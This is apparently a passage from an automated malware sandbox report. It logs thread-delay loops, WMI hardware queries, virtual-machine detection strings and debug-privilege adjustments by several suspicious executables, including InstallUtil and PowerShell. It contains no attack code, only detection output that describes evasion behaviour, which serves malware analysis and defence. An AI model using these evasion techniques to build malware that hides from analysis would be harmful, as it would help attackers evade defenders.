                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -99434s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -99316s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -99187s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -98921s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -98804s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -98687s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -98574s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -98468s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -98359s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -98249s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -97989s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -97859s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -97746s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7844 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7812 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep count: 39 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -35971150943733603s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080 Thread sleep count: 4960 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080 Thread sleep count: 4684 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -99797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -99670s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -99562s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -99448s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -99343s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -99234s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -99122s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -99001s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -98875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -98766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -98624s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -98507s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -98389s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -98272s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -98141s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -98000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -59881s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -59757s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -59641s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -59515s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -59387s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -59278s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -59171s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -59062s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -58942s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -58801s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -58643s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -58516s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -58397s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -58259s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -58141s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -58016s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57781s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57669s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57562s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57344s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57231s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57121s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -57008s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -56895s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -56766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -56656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -56547s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -56234s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -56118s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -56000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -55877s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -55750s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -55641s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292 Thread sleep count: 8118 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308 Thread sleep count: 1388 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5356 Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -16602069666338586s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 7628 Thread sleep count: 3588 > 30
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -99834s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 7628 Thread sleep count: 601 > 30
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -99703s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -99565s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -99437s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -99328s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -99218s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -99108s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -98999s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -98890s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804 Thread sleep time: -98765s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -98527s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -98406s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -98295s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -98186s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -98051s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -97922s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -97810s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -97703s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -97593s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -97484s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 8000Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99874
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99765
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99656
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99546
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99437
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99328
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99219
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99108
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99000
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98877
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98750
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98640
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98526
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98360
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98234
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98125
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98015
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 97906
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 99874
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 99765
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 99656
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 99546
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 99434
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 99316
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 99187
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 98921
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 98804
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 98687
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 98574
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 98468
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 98359
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 98249
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 97989
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 97859
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 97746
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99670
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99448
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99122
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99001
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98624
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98507
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98389
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98272
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 60000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59881
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59757
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59515
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59387
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59171
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59062
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58942
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58801
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58643
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58516
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58397
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58259
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57669
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57231
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57121
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 56895
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 56766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 56656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 56547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 56234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 56118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 56000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 55877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 55750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 55641
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 99834
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 99703
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 99565
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 99437
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 99328
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 99218
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 99108
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 98999
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 98890
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 98765
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 98527
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 98406
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 98295
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 98186
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 98051
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 97922
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 97810
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 97703
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 97593
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 97484
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 922337203685477
                    Source: txxbiwtbs.exe, 0000000B.00000002.1995844689.00000000029BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: txxbiwtbs.exe, 0000000B.00000002.1995844689.00000000029BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: InstallUtil.exe, 00000004.00000002.2968906608.00000000013D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                    Source: file.exe, 00000000.00000002.1761959990.0000000001275000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1975910314.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\file.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\file.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\file.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

